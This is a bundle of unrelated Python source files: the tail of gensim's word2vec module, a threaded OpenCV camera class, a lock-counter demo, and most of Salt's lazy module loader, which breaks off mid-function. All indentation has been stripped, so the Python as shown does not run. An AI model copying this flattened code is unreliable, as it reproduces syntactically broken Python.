# construct deterministic seed from word AND seed argument
newvectors[i - len(wv.vectors)] = self.seeded_vector(wv.index2word[i] + str(self.seed), wv.vector_size)
# Raise an error if an online update is run before initial training on a corpus
if not len(wv.vectors):
raise RuntimeError(
"You cannot do an online vocabulary-update of a model which has no prior vocabulary. "
"First build the vocabulary of your model with a corpus before doing an online update."
)
wv.vectors = vstack([wv.vectors, newvectors])
if hs:
self.syn1 = vstack([self.syn1, zeros((gained_vocab, self.layer1_size), dtype=REAL)])
if negative:
pad = zeros((gained_vocab, self.layer1_size), dtype=REAL)
self.syn1neg = vstack([self.syn1neg, pad])
wv.vectors_norm = None
# do not suppress learning for already learned words
self.vectors_lockf = ones(len(wv.vocab), dtype=REAL) # zeros suppress learning
# Example: ./word2vec.py -train data.txt -output vec.txt -size 200 -window 5 -sample 1e-4 \
# -negative 5 -hs 0 -binary 0 -cbow 1 -iter 3
if __name__ == "__main__":
import argparse
logging.basicConfig(
format='%(asctime)s : %(threadName)s : %(levelname)s : %(message)s',
level=logging.INFO
)
logger.info("running %s", " ".join(sys.argv))
logger.info("using optimization %s", FAST_VERSION)
# check and process cmdline input
program = os.path.basename(sys.argv[0])
if len(sys.argv) < 2:
print(globals()['__doc__'] % locals())
sys.exit(1)
from gensim.models.word2vec import Word2Vec # noqa:F811 avoid referencing __main__ in pickle
seterr(all='raise') # don't ignore numpy errors
parser = argparse.ArgumentParser()
parser.add_argument("-train", help="Use text data from file TRAIN to train the model", required=True)
parser.add_argument("-output", help="Use file OUTPUT to save the resulting word vectors")
parser.add_argument("-window", help="Set max skip length WINDOW between words; default is 5", type=int, default=5)
parser.add_argument("-size", help="Set size of word vectors; default is 100", type=int, default=100)
parser.add_argument(
"-sample",
help="Set threshold for occurrence of words. "
"Those that appear with higher frequency in the training data will be randomly down-sampled;"
" default is 1e-3, useful range is (0, 1e-5)",
type=float, default=1e-3
)
parser.add_argument(
"-hs", help="Use Hierarchical Softmax; default is 0 (not used)",
type=int, default=0, choices=[0, 1]
)
parser.add_argument(
"-negative", help="Number of negative examples; default is 5, common values are 3 - 10 (0 = not used)",
type=int, default=5
)
parser.add_argument("-threads", help="Use THREADS threads (default 12)", type=int, default=12)
parser.add_argument("-iter", help="Run more training iterations (default 5)", type=int, default=5)
parser.add_argument(
"-min_count", help="This will discard words that appear less than MIN_COUNT times; default is 5",
type=int, default=5
)
parser.add_argument(
"-cbow", help="Use the continuous bag of words model; default is 1 (use 0 for skip-gram model)",
type=int, default=1, choices=[0, 1]
)
parser.add_argument(
"-binary", help="Save the resulting vectors in binary mode; default is 0 (off)",
type=int, default=0, choices=[0, 1]
)
parser.add_argument("-accuracy", help="Use questions from file ACCURACY to evaluate the model")
args = parser.parse_args()
if args.cbow == 0:
skipgram = 1
else:
skipgram = 0
corpus = LineSentence(args.train)
model = Word2Vec(
corpus, size=args.size, min_count=args.min_count, workers=args.threads,
window=args.window, sample=args.sample, sg=skipgram, hs=args.hs,
negative=args.negative, cbow_mean=1, iter=args.iter
)
if args.output:
outfile = args.output
model.wv.save_word2vec_format(outfile, binary=args.binary)
else:
outfile = args.train
model.save(outfile + '.model')
if args.binary == 1:
model.wv.save_word2vec_format(outfile + '.model.bin', binary=True)
else:
model.wv.save_word2vec_format(outfile + '.model.txt', binary=False)
if args.accuracy:
model.accuracy(args.accuracy)
logger.info("finished running %s", program)
|
camera.py
|
#!/usr/bin/env python3
#!/usr/bin/python3.8
# OpenCV 4.2, Raspberry pi 3/3b/4b - test on macOS
import cv2
from threading import Thread, Lock
import time
#internal
from app.camera.frame import Frame
from app.utils.settings import get_config
from app.dto.record import FrameDTO, ConfigDTO
from app.camera.process_frame import ProcessFrame
class CameraAsync:
def __init__(self, source=0, name='thread-stream-0'):
super().__init__()
self.name = name
self.source = source
self.__config = ConfigDTO(get_config())
self.__frame = Frame(self.__config)
self.started = False
self.read_lock = Lock()
self.stream = None
self.grabbed1, self.frame1 = None, None
self.grabbed2, self.frame2 = None, None
self.image = None
self.thread = None
def __build(self) -> None:
if self.stream and self.stream.isOpened():
return
self.__process_frame = ProcessFrame(self.__config)
self.__process_frame.initialize()
self.stream = cv2.VideoCapture(self.source)
if self.__config.camera.dimHeight == 0 or self.__config.camera.dimWidth == 0:
self.__config.camera.dimWidth = int(self.stream.get(3))
self.__config.camera.dimHeight = int(self.stream.get(4))
self.__config.camera.applyResize = False
else:
self.__config.camera.applyResize = True
#self.stream.set(cv2.CAP_PROP_FRAME_WIDTH, int(self.__config.camera.dimWidth))
#self.stream.set(cv2.CAP_PROP_FRAME_HEIGHT, int(self.__config.camera.dimHeight))
def initialize(self) -> None:
self.__build()
def get_started(self) -> bool:
return self.started
def start(self) -> None:
if self.started == True:
return
self.started = True
self.thread = Thread(target=self.__update, args=(), name=self.name, daemon=True)
self.thread.start()
def __update(self) -> None:
while self.started == True and self.stream.isOpened() == True:
(grabbed, frame) = self.stream.read()
while grabbed == False: (grabbed, frame) = self.stream.read()
self.__process(grabbed, frame)
def __set_frame(self, grabbed, frame) -> None:
if self.frame1 is None or self.frame2 is None:
self.grabbed1, self.frame1 = grabbed, frame
else:
self.grabbed1, self.frame1 = self.grabbed2, self.frame2
self.grabbed2, self.frame2 = grabbed, frame
def __process(self, grabbed, frame):
self.__set_frame(grabbed, frame)
if self.__config.camera.applyResize == True:
self.frame2 = self.__frame.resize(self.frame2)
with self.read_lock:
_, self.image = self.__frame.frame_to_image(self.frame2)
frame_dto = FrameDTO(self.source, self.frame1, self.frame2, self.image)
self.__process_frame.put_item(frame_dto)
def read(self) -> any:
try:
self.read_lock.acquire()
frame = self.image.copy()
except Exception as e:
frame = None
finally:
self.read_lock.release()
return frame
def stop(self) -> any:
try:
self.started = False
time.sleep(0.9)
if self.thread:
self.thread.join()
self.release()
self.__process_frame.stop()
except Exception as e:
print(e)
def release(self):
if self.stream:
self.stream.release()
|
locked_ops_threads.py
|
import time
import threading
class SomeClass(object):
def __init__(self,c):
self.c=c
self.lock = threading.Lock()
def inc(self):
self.lock.acquire()
try:
new = self.c+1
# if the thread is interrupted by another inc() call its result is wrong
time.sleep(0.001) # sleep makes the os continue another thread
self.c = new
finally:
self.lock.release()
x = SomeClass(0)
threads = []
for _ in range(1000):
t= threading.Thread(target=x.inc)
threads.append(t)
t.start()
for th in threads:
th.join()
print( x.c) # now there are 1000
|
lazy.py
|
import copy
import functools
import importlib
import importlib.machinery
import importlib.util
import inspect
import logging
import os
import pathlib
import re
import sys
import tempfile
import threading
import time
import traceback
import types
from collections.abc import MutableMapping
from zipimport import zipimporter
import salt.config
import salt.defaults.events
import salt.defaults.exitcodes
import salt.loader.context
import salt.syspaths
import salt.utils.args
import salt.utils.context
import salt.utils.data
import salt.utils.dictupdate
import salt.utils.event
import salt.utils.files
import salt.utils.lazy
import salt.utils.odict
import salt.utils.platform
import salt.utils.stringutils
import salt.utils.versions
from salt.utils.decorators import Depends
try:
# Try the stdlib C extension first
import _contextvars as contextvars
except ImportError:
# Py<3.7
import contextvars
log = logging.getLogger(__name__)
# pylint: disable=no-member
MODULE_KIND_SOURCE = 1
MODULE_KIND_COMPILED = 2
MODULE_KIND_EXTENSION = 3
MODULE_KIND_PKG_DIRECTORY = 5
SUFFIXES = []
for suffix in importlib.machinery.EXTENSION_SUFFIXES:
SUFFIXES.append((suffix, "rb", MODULE_KIND_EXTENSION))
for suffix in importlib.machinery.SOURCE_SUFFIXES:
SUFFIXES.append((suffix, "rb", MODULE_KIND_SOURCE))
for suffix in importlib.machinery.BYTECODE_SUFFIXES:
SUFFIXES.append((suffix, "rb", MODULE_KIND_COMPILED))
MODULE_KIND_MAP = {
MODULE_KIND_SOURCE: importlib.machinery.SourceFileLoader,
MODULE_KIND_COMPILED: importlib.machinery.SourcelessFileLoader,
MODULE_KIND_EXTENSION: importlib.machinery.ExtensionFileLoader,
}
# pylint: enable=no-member
SALT_BASE_PATH = pathlib.Path(salt.syspaths.INSTALL_DIR).resolve()
LOADED_BASE_NAME = "salt.loaded"
PY3_PRE_EXT = re.compile(r"\.cpython-{}{}(\.opt-[1-9])?".format(*sys.version_info[:2]))
# Will be set to pyximport module at runtime if cython is enabled in config.
pyximport = None
def _generate_module(name):
if name in sys.modules:
return
code = "'''Salt loaded {} parent module'''".format(name.split(".")[-1])
# ModuleType can't accept a unicode type on PY2
module = types.ModuleType(str(name))
exec(code, module.__dict__)
sys.modules[name] = module
def _mod_type(module_path):
if module_path.startswith(str(SALT_BASE_PATH)):
return "int"
return "ext"
class FilterDictWrapper(MutableMapping):
"""
Create a dict which wraps another dict with a specific key suffix on get
This is to replace "filter_load"
"""
def __init__(self, d, suffix):
self._dict = d
self.suffix = suffix
def __setitem__(self, key, val):
self._dict[key] = val
def __delitem__(self, key):
del self._dict[key]
def __getitem__(self, key):
return self._dict[key + self.suffix]
def __len__(self):
return len(self._dict)
def __iter__(self):
for key in self._dict:
if key.endswith(self.suffix):
yield key.replace(self.suffix, "")
class LoadedFunc:
"""
The functions loaded by LazyLoader instances using subscript notation
'a[k]' will be wrapped with LoadedFunc.
- Makes sure functions are called with the correct loader's context.
- Provides access to a wrapped func's __global__ attribute
:param func callable: The callable to wrap.
:param dict loader: The loader to use in the context when the wrapped callable is called.
"""
def __init__(self, func, loader):
self.func = func
self.loader = loader
functools.update_wrapper(self, func)
def __getattr__(self, name):
return getattr(self.func, name)
def __call__(self, *args, **kwargs):
if self.loader.inject_globals:
run_func = global_injector_decorator(self.loader.inject_globals)(self.func)
else:
run_func = self.func
return self.loader.run(run_func, *args, **kwargs)
class LoadedMod:
def __init__(self, mod, loader):
"""
Return the wrapped func's globals via this object's __globals__
attribute.
"""
self.mod = mod
self.loader = loader
def __getattr__(self, name):
"""
Run the wrapped function in the loader's context.
"""
attr = getattr(self.mod, name)
if inspect.isfunction(attr) or inspect.ismethod(attr):
return LoadedFunc(attr, self.loader)
return attr
class LazyLoader(salt.utils.lazy.LazyDict):
"""
A pseduo-dictionary which has a set of keys which are the
name of the module and function, delimited by a dot. When
the value of the key is accessed, the function is then loaded
from disk and into memory.
.. note::
Iterating over keys will cause all modules to be loaded.
:param list module_dirs: A list of directories on disk to search for modules
:param dict opts: The salt options dictionary.
:param str tag: The tag for the type of module to load
:param func mod_type_check: A function which can be used to verify files
:param dict pack: A dictionary of function to be packed into modules as they are loaded
:param list whitelist: A list of modules to whitelist
:param bool virtual_enable: Whether or not to respect the __virtual__ function when loading modules.
:param str virtual_funcs: The name of additional functions in the module to call to verify its functionality.
If not true, the module will not load.
:param list extra_module_dirs: A list of directories that will be able to import from
:param str pack_self: Pack this module into a variable by this name into modules loaded
:returns: A LazyLoader object which functions as a dictionary. Keys are 'module.function' and values
are function references themselves which are loaded on-demand.
# TODO:
- move modules_max_memory into here
- singletons (per tag)
"""
mod_dict_class = salt.utils.odict.OrderedDict
def __init__(
self,
module_dirs,
opts=None,
tag="module",
loaded_base_name=None,
mod_type_check=None,
pack=None,
whitelist=None,
virtual_enable=True,
static_modules=None,
proxy=None,
virtual_funcs=None,
extra_module_dirs=None,
pack_self=None,
): # pylint: disable=W0231
"""
In pack, if any of the values are None they will be replaced with an
empty context-specific dict
"""
self.parent_loader = None
self.inject_globals = {}
self.pack = {} if pack is None else pack
for i in self.pack:
if isinstance(self.pack[i], salt.loader.context.NamedLoaderContext):
self.pack[i] = self.pack[i].value()
if opts is None:
opts = {}
opts = copy.deepcopy(opts)
for i in ["pillar", "grains"]:
if i in opts and isinstance(
opts[i], salt.loader.context.NamedLoaderContext
):
opts[i] = opts[i].value()
threadsafety = not opts.get("multiprocessing")
self.context_dict = salt.utils.context.ContextDict(threadsafe=threadsafety)
self.opts = self.__prep_mod_opts(opts)
self.pack_self = pack_self
self.module_dirs = module_dirs
self.tag = tag
self._gc_finalizer = None
if loaded_base_name and loaded_base_name != LOADED_BASE_NAME:
self.loaded_base_name = loaded_base_name
else:
self.loaded_base_name = LOADED_BASE_NAME
self.mod_type_check = mod_type_check or _mod_type
if "__context__" not in self.pack:
self.pack["__context__"] = None
for k, v in self.pack.items():
if v is None: # if the value of a pack is None, lets make an empty dict
self.context_dict.setdefault(k, {})
self.pack[k] = salt.utils.context.NamespacedDictWrapper(
self.context_dict, k
)
self.whitelist = whitelist
self.virtual_enable = virtual_enable
self.initial_load = True
# names of modules that we don't have (errors, __virtual__, etc.)
self.missing_modules = {} # mapping of name -> error
self.loaded_modules = {} # mapping of module_name -> dict_of_functions
self.loaded_files = set() # TODO: just remove them from file_mapping?
self.static_modules = static_modules if static_modules else []
if virtual_funcs is None:
virtual_funcs = []
self.virtual_funcs = virtual_funcs
self.extra_module_dirs = extra_module_dirs if extra_module_dirs else []
self._clean_module_dirs = []
self.disabled = set(
self.opts.get(
"disable_{}{}".format(self.tag, "" if self.tag[-1] == "s" else "s"),
[],
)
)
# A map of suffix to description for imp
self.suffix_map = {}
# A list to determine precedence of extensions
# Prefer packages (directories) over modules (single files)!
self.suffix_order = [""]
for (suffix, mode, kind) in SUFFIXES:
self.suffix_map[suffix] = (suffix, mode, kind)
self.suffix_order.append(suffix)
self._lock = threading.RLock()
with self._lock:
self._refresh_file_mapping()
super().__init__() # late init the lazy loader
# create all of the import namespaces
_generate_module("{}.int".format(self.loaded_base_name))
_generate_module("{}.int.{}".format(self.loaded_base_name, tag))
_generate_module("{}.ext".format(self.loaded_base_name))
_generate_module("{}.ext.{}".format(self.loaded_base_name, tag))
def clean_modules(self):
"""
Clean modules
"""
for name in list(sys.modules):
if name.startswith(self.loaded_base_name):
del sys.modules[name]
def __getitem__(self, item):
"""
Override the __getitem__ in order to decorate the returned function if we need
to last-minute inject globals
"""
func = super().__getitem__(item)
return LoadedFunc(func, self)
def __getattr__(self, mod_name):
"""
Allow for "direct" attribute access-- this allows jinja templates to
access things like `salt.test.ping()`
"""
if mod_name in ("__getstate__", "__setstate__"):
return object.__getattribute__(self, mod_name)
# if we have an attribute named that, lets return it.
try:
return object.__getattr__(self, mod_name) # pylint: disable=no-member
except AttributeError:
pass
# otherwise we assume its jinja template access
if mod_name not in self.loaded_modules and not self.loaded:
for name in self._iter_files(mod_name):
if name in self.loaded_files:
continue
# if we got what we wanted, we are done
if self._load_module(name) and mod_name in self.loaded_modules:
break
if mod_name in self.loaded_modules:
return LoadedMod(self.loaded_modules[mod_name], self)
else:
raise AttributeError(mod_name)
def missing_fun_string(self, function_name):
"""
Return the error string for a missing function.
This can range from "not available' to "__virtual__" returned False
"""
mod_name = function_name.split(".")[0]
if mod_name in self.loaded_modules:
return "'{}' is not available.".format(function_name)
else:
try:
reason = self.missing_modules[mod_name]
except KeyError:
return "'{}' is not available.".format(function_name)
else:
if reason is not None:
return "'{}' __virtual__ returned False: {}".format(
mod_name, reason
)
else:
return "'{}' __virtual__ returned False".format(mod_name)
def _refresh_file_mapping(self):
"""
refresh the mapping of the FS on disk
"""
# map of suffix to description for imp
if (
self.opts.get("cython_enable", True) is True
and ".pyx" not in self.suffix_map
):
try:
global pyximport
pyximport = __import__("pyximport") # pylint: disable=import-error
pyximport.install()
# add to suffix_map so file_mapping will pick it up
self.suffix_map[".pyx"] = tuple()
if ".pyx" not in self.suffix_order:
self.suffix_order.append(".pyx")
except ImportError:
log.info(
"Cython is enabled in the options but not present "
"in the system path. Skipping Cython modules."
)
# Allow for zipimport of modules
if (
self.opts.get("enable_zip_modules", True) is True
and ".zip" not in self.suffix_map
):
self.suffix_map[".zip"] = tuple()
if ".zip" not in self.suffix_order:
self.suffix_order.append(".zip")
# allow for module dirs
self.suffix_map[""] = ("", "", MODULE_KIND_PKG_DIRECTORY)
# create mapping of filename (without suffix) to (path, suffix)
# The files are added in order of priority, so order *must* be retained.
self.file_mapping = salt.utils.odict.OrderedDict()
opt_match = []
def _replace_pre_ext(obj):
"""
Hack so we can get the optimization level that we replaced (if
any) out of the re.sub call below. We use a list here because
it is a persistent data structure that we will be able to
access after re.sub is called.
"""
opt_match.append(obj)
return ""
for mod_dir in self.module_dirs:
try:
# Make sure we have a sorted listdir in order to have
# expectable override results
files = sorted(x for x in os.listdir(mod_dir) if x != "__pycache__")
except OSError:
continue # Next mod_dir
try:
pycache_files = [
os.path.join("__pycache__", x)
for x in sorted(os.listdir(os.path.join(mod_dir, "__pycache__")))
]
except OSError:
pass
else:
files.extend(pycache_files)
for filename in files:
try:
dirname, basename = os.path.split(filename)
if basename.startswith("_"):
# skip private modules
# log messages omitted for obviousness
continue # Next filename
f_noext, ext = os.path.splitext(basename)
f_noext = PY3_PRE_EXT.sub(_replace_pre_ext, f_noext)
try:
opt_level = int(opt_match.pop().group(1).rsplit("-", 1)[-1])
except (AttributeError, IndexError, ValueError):
# No regex match or no optimization level matched
opt_level = 0
try:
opt_index = self.opts["optimization_order"].index(opt_level)
except KeyError:
log.trace(
"Disallowed optimization level %d for module "
"name '%s', skipping. Add %d to the "
"'optimization_order' config option if you "
"do not want to ignore this optimization "
"level.",
opt_level,
f_noext,
opt_level,
)
continue
# make sure it is a suffix we support
if ext not in self.suffix_map:
continue # Next filename
if f_noext in self.disabled:
log.trace(
"Skipping %s, it is disabled by configuration", filename
)
continue # Next filename
fpath = os.path.join(mod_dir, filename)
# if its a directory, lets allow us to load that
if ext == "":
# is there something __init__?
subfiles = os.listdir(fpath)
for suffix in self.suffix_order:
if "" == suffix:
continue # Next suffix (__init__ must have a suffix)
init_file = "__init__{}".format(suffix)
if init_file in subfiles:
break
else:
continue # Next filename
try:
curr_ext = self.file_mapping[f_noext][1]
curr_opt_index = self.file_mapping[f_noext][2]
except KeyError:
pass
else:
if "" in (curr_ext, ext) and curr_ext != ext:
log.error(
"Module/package collision: '%s' and '%s'",
fpath,
self.file_mapping[f_noext][0],
)
if ext == ".pyc" and curr_ext == ".pyc":
# Check the optimization level
if opt_index >= curr_opt_index:
# Module name match, but a higher-priority
# optimization level was already matched, skipping.
continue
elif not curr_ext or self.suffix_order.index(
ext
) >= self.suffix_order.index(curr_ext):
# Match found but a higher-priorty match already
# exists, so skip this.
continue
if not dirname and ext == ".pyc":
# On Python 3, we should only load .pyc files from the
# __pycache__ subdirectory (i.e. when dirname is not an
# empty string).
continue
# Made it this far - add it
self.file_mapping[f_noext] = (fpath, ext, opt_index)
except OSError:
continue
for smod in self.static_modules:
f_noext = smod.split(".")[-1]
self.file_mapping[f_noext] = (smod, ".o", 0)
def clear(self):
"""
Clear the dict
"""
with self._lock:
super().clear() # clear the lazy loader
self.loaded_files = set()
self.missing_modules = {}
self.loaded_modules = {}
# if we have been loaded before, lets clear the file mapping since
# we obviously want a re-do
if hasattr(self, "opts"):
self._refresh_file_mapping()
self.initial_load = False
def __prep_mod_opts(self, opts):
"""
Strip out of the opts any logger instance
"""
if "__grains__" not in self.pack:
grains = opts.get("grains", {})
if isinstance(grains, salt.loader.context.NamedLoaderContext):
grains = grains.value()
self.context_dict["grains"] = grains
self.pack["__grains__"] = salt.utils.context.NamespacedDictWrapper(
self.context_dict, "grains"
)
if "__pillar__" not in self.pack:
pillar = opts.get("pillar", {})
if isinstance(pillar, salt.loader.context.NamedLoaderContext):
pillar = pillar.value()
self.context_dict["pillar"] = pillar
self.pack["__pillar__"] = salt.utils.context.NamespacedDictWrapper(
self.context_dict, "pillar"
)
mod_opts = {}
for key, val in list(opts.items()):
if key == "logger":
continue
mod_opts[key] = val
return mod_opts
def _iter_files(self, mod_name):
"""
Iterate over all file_mapping files in order of closeness to mod_name
"""
# do we have an exact match?
if mod_name in self.file_mapping:
yield mod_name
# do we have a partial match?
for k in self.file_mapping:
if mod_name in k:
yield k
# anyone else? Bueller?
for k in self.file_mapping:
if mod_name not in k:
yield k
def _reload_submodules(self, mod):
submodules = (
getattr(mod, sname)
for sname in dir(mod)
if isinstance(getattr(mod, sname), mod.__class__)
)
# reload only custom "sub"modules
for submodule in submodules:
# it is a submodule if the name is in a namespace under mod
if submodule.__name__.startswith(mod.__name__ + "."):
importlib.reload(submodule)
self._reload_submodules(submodule)
def __populate_sys_path(self):
for directory in self.extra_module_dirs:
if directory not in sys.path:
sys.path.append(directory)
self._clean_module_dirs.append(directory)
def __clean_sys_path(self):
invalidate_path_importer_cache = False
for directory in self._clean_module_dirs:
if directory in sys.path:
sys.path.remove(directory)
invalidate_path_importer_cache = True
self._clean_module_dirs = []
# Be sure that sys.path_importer_cache do not contains any
# invalid FileFinder references
importlib.invalidate_caches()
# Because we are mangling with importlib, we can find from
# time to time an invalidation issue with
# sys.path_importer_cache, that requires the removal of
# FileFinder that remain None for the extra_module_dirs
if invalidate_path_importer_cache:
for directory in self.extra_module_dirs:
if (
directory in sys.path_importer_cache
and sys.path_importer_cache[directory] is None
):
del sys.path_importer_cache[directory]
def _load_module(self, name):
mod = None
fpath, suffix = self.file_mapping[name][:2]
# if the fpath has `.cpython-3x` in it, but the running Py version
# is 3.y, the following will cause us to return immediately and we won't try to import this .pyc.
# This is for the unusual case where several Python versions share a single
# source tree and drop their .pycs in the same __pycache__ folder.
# If we were to load a .pyc for another Py version it's not a big problem
# but the log will get spammed with "Bad Magic Number" messages that
# can be very misleading if the user is debugging another problem.
try:
(implementation_tag, cache_tag_ver) = sys.implementation.cache_tag.split(
"-"
)
if cache_tag_ver not in fpath and implementation_tag in fpath:
log.trace(
"Trying to load %s on %s, returning False.",
fpath,
sys.implementation.cache_tag,
)
return False
except AttributeError:
# Most likely Py 2.7 or some other Python version we don't really support
pass
self.loaded_files.add(name)
fpath_dirname = os.path.dirname(fpath)
try:
self.__populate_sys_path()
sys.path.append(fpath_dirname)
if suffix == ".pyx":
mod = pyximport.load_module(name, fpath, tempfile.gettempdir())
elif suffix == ".o":
top_mod = __import__(fpath, globals(), locals(), [])
comps = fpath.split(".")
if len(comps) < 2:
mod = top_mod
else:
mod = top_mod
for subname in comps[1:]:
mod = getattr(mod, subname)
elif suffix == ".zip":
mod = zipimporter(fpath).load_module(name)
else:
desc = self.suffix_map[suffix]
# if it is a directory, we don't open a file
try:
mod_namespace = ".".join(
(
self.loaded_base_name,
self.mod_type_check(fpath),
self.tag,
name,
)
)
except TypeError:
mod_namespace = "{}.{}.{}.{}".format(
self.loaded_base_name,
self.mod_type_check(fpath),
self.tag,
name,
)
if suffix == "":
# pylint: disable=no-member
# Package directory, look for __init__
loader_details = [
(
importlib.machinery.SourceFileLoader,
importlib.machinery.SOURCE_SUFFIXES,
),
(
importlib.machinery.SourcelessFileLoader,
importlib.machinery.BYTECODE_SUFFIXES,
),
(
importlib.machinery.ExtensionFileLoader,
importlib.machinery.EXTENSION_SUFFIXES,
),
]
file_finder = importlib.machinery.FileFinder(
fpath_dirname, *loader_details
)
spec = file_finder.find_spec(mod_namespace)
if spec is None:
raise ImportError()
# TODO: Get rid of load_module in favor of
# exec_module below. load_module is deprecated, but
# loading using exec_module has been causing odd things
# with the magic dunders we pack into the loaded
# modules, most notably with salt-ssh's __opts__.
mod = spec.loader.load_module()
# mod = importlib.util.module_from_spec(spec)
# spec.loader.exec_module(mod)
# pylint: enable=no-member
sys.modules[mod_namespace] = mod
# reload all submodules if necessary
if not self.initial_load:
self._reload_submodules(mod)
else:
# pylint: disable=no-member
loader = MODULE_KIND_MAP[desc[2]](mod_namespace, fpath)
spec = importlib.util.spec_from_file_location(
mod_namespace, fpath, loader=loader
)
if spec is None:
raise ImportError()
# TODO: Get rid of load_module in favor of
# exec_module below. load_module is deprecated, but
# loading using exec_module has been causing odd things
# with the magic dunders we pack into the loaded
# modules, most notably with salt-ssh's __opts__.
mod = self.run(spec.loader.load_module)
# mod = importlib.util.module_from_spec(spec)
# spec.loader.exec_module(mod)
# pylint: enable=no-member
sys.modules[mod_namespace] = mod
except OSError:
raise
except ImportError as exc:
if "magic number" in str(exc):
error_msg = (
"Failed to import {} {}. Bad magic number. If migrating from"
" Python2 to Python3, remove all .pyc files and try again.".format(
self.tag, name
)
)
log.warning(error_msg)
self.missing_modules[name] = error_msg
log.debug("Failed to import %s %s:\n", self.tag, name, exc_info=True)
self.missing_modules[name] = exc
return False
except Exception as error: # pylint: disable=broad-except
log.error(
"Failed to import %s %s, this is due most likely to a syntax error:\n",
self.tag,
name,
exc_info=True,
)
self.missing_modules[name] = error
return False
except SystemExit as error:
try:
fn_, _, caller, _ = traceback.extract_tb(sys.exc_info()[2])[-1]
except Exception: # pylint: disable=broad-except
pass
else:
tgt_fns = [
os.path.join("salt", "utils", "process.py"),
os.path.join("salt", "cli", "daemons.py"),
os.path.join("salt", "cli", "api.py"),
]
for tgt_fn in tgt_fns:
if fn_.endswith(tgt_fn) and "_handle_signals" in caller:
# Race conditon, SIGTERM or SIGINT received while loader
# was in process of loading a module. Call sys.exit to
# ensure that the process is killed.
sys.exit(salt.defaults.exitcodes.EX_OK)
log.error(
"Failed to import %s %s as the module called exit()\n",
self.tag,
name,
exc_info=True,
)
self.missing_modules[name] = error
return False
finally:
sys.path.remove(fpath_dirname)
self.__clean_sys_path()
loader_context = salt.loader.context.LoaderContext()
if hasattr(mod, "__salt_loader__"):
if not isinstance(mod.__salt_loader__, salt.loader.context.LoaderContext):
log.warning("Override __salt_loader__: %s", mod)
mod.__salt_loader__ = loader_context
else:
mod.__salt_loader__ = loader_context
if hasattr(mod, "__opts__"):
if not isinstance(mod.__opts__, salt.loader.context.NamedLoaderContext):
if not hasattr(mod, "__orig_opts__"):
mod.__orig_opts__ = copy.deepcopy(mod.__opts__)
mod.__opts__ = copy.deepcopy(mod.__orig_opts__)
mod.__opts__.update(self.opts)
else:
if not hasattr(mod, "__orig_opts__"):
mod.__orig_opts__ = {}
mod.__opts__ = copy.deepcopy(mod.__orig_opts__)
mod.__opts__.update(self.opts)
# pack whatever other globals we were asked to
for p_name, p_value in self.pack.items():
mod_named_context = getattr(mod, p_name, None)
if hasattr(mod_named_context, "default"):
default = copy.deepcopy(mod_named_context.default)
else:
default = None
named_context = loader_context.named_context(p_name, default)
if mod_named_context is None:
setattr(mod, p_name, named_context)
elif named_context != mod_named_context:
log.debug("Override %s: %s", p_name, mod)
setattr(mod, p_name, named_context)
else:
setattr(mod, p_name, named_context)
if self.pack_self is not None:
mod_named_context = getattr(mod, self.pack_self, None)
if hasattr(mod_named_context, "default"):
default = copy.deepcopy(mod_named_context.default)
else:
default = None
named_context = loader_context.named_context(self.pack_self, default)
if mod_named_context is None:
setattr(mod, self.pack_self, named_context)
elif named_context != mod_named_context:
log.debug("Override %s: %s", self.pack_self, mod)
setattr(mod, self.pack_self, named_context)
else:
setattr(mod, self.pack_self, named_context)
module_name = mod.__name__.rsplit(".", 1)[-1]
# Call a module's initialization method if it exists
module_init = getattr(mod, "__init__", None)
if inspect.isfunction(module_init):
try:
self.run(module_init, self.opts)
except TypeError as e:
log.error(e)
except Exception: # pylint: disable=broad-except
err_string = "__init__ failed"
log.debug(
"Error loading %s.%s: %s",
self.tag,
module_name,
err_string,
exc_info=True,
)
self.missing_modules[module_name] = err_string
self.missing_modules[name] = err_string
return False
# if virtual modules are enabled, we need to look for the
# __virtual__() function inside that module and run it.
if self.virtual_enable:
virtual_funcs_to_process = ["__virtual__"] + self.virtual_funcs
for virtual_func in virtual_funcs_to_process:
(
virtual_ret,
module_name,
virtual_err,
virtual_aliases,
) = self._process_virtual(mod, module_name, virtual_func)
if virtual_err is not None:
log.trace(
"Error loading %s.%s: %s", self.tag, module_name, virtual_err
)
# if _process_virtual returned a non-True value then we are
# supposed to not process this module
if virtual_ret is not True and module_name not in self.missing_modules:
# If a module has information about why it could not be loaded, record it
self.missing_modules[module_name] = virtual_err
self.missing_modules[name] = virtual_err
return False
else:
virtual_aliases = ()
# If this is a proxy minion then MOST modules cannot work. Therefore, require that
# any module that does work with salt-proxy-minion define __proxyenabled__ as a list
# containing the names of the proxy types that the module supports.
#
# Render modules and state modules are OK though
if "proxy" in self.opts:
if self.tag in ["grains", "proxy"]:
if not hasattr(mod, "__proxyenabled__") or (
self.opts["proxy"]["proxytype"] not in mod.__proxyenabled__
and "*" not in mod.__proxyenabled__
):
err_string = "not a proxy_minion enabled module"
self.missing_modules[module_name] = err_string
self.missing_modules[name] = err_string
return False
if getattr(mod, "__load__", False) is not False:
log.info(
"The functions from module '%s' are being loaded from the "
"provided __load__ attribute",
module_name,
)
# If we had another module by the same virtual name, we should put any
# new functions under the existing dictionary.
mod_names = [module_name] + list(virtual_aliases)
mod_dict = {
x: self.loaded_modules.get(x, self.mod_dict_class()) for x in mod_names
}
for attr in getattr(mod, "__load__", dir(mod)):
if attr.startswith("_"):
# private functions are skipped
continue
func = getattr(mod, attr)
if not inspect.isfunction(func) and not isinstance(func, functools.partial):
# Not a function!? Skip it!!!
continue
# Let's get the function name.
# If the module has the __func_alias__ attribute, it must be a
# dictionary mapping in the form of(key -> value):
# <real-func-name> -> <desired-func-name>
#
# It default's of course to the found callable attribute name
# if no alias is defined.
funcname = getattr(mod, "__func_alias__", {}).get(attr, attr)
for tgt_mod in mod_names:
try:
full_funcname = ".".join((tgt_mod, funcname))
except TypeError:
full_funcname = "{}.{}".format(tgt_mod, funcname)
# Save many references for lookups
# Careful not to overwrite existing (higher priority) functions
if full_funcname not in self._dict:
self._dict[full_funcname] = func
if funcname not in mod_dict[tgt_mod]:
setattr(mod_dict[tgt_mod], funcname, func)
mod_dict[tgt_mod][funcname] = func
self._apply_outputter(func, mod)
# enforce depends
try:
Depends.enforce_dependencies(self._dict, self.tag, name)
except RuntimeError as exc:
log.info(
"Depends.enforce_dependencies() failed for the following reason: %s",
exc,
)
for tgt_mod in mod_names:
self.loaded_modules[tgt_mod] = mod_dict[tgt_mod]
return True
def _load(self, key):
"""
Load a single item if you have it
"""
# if the key doesn't have a '.' then it isn't valid for this mod dict
if not isinstance(key, str):
raise KeyError("The key must be a string.")
if "." not in key:
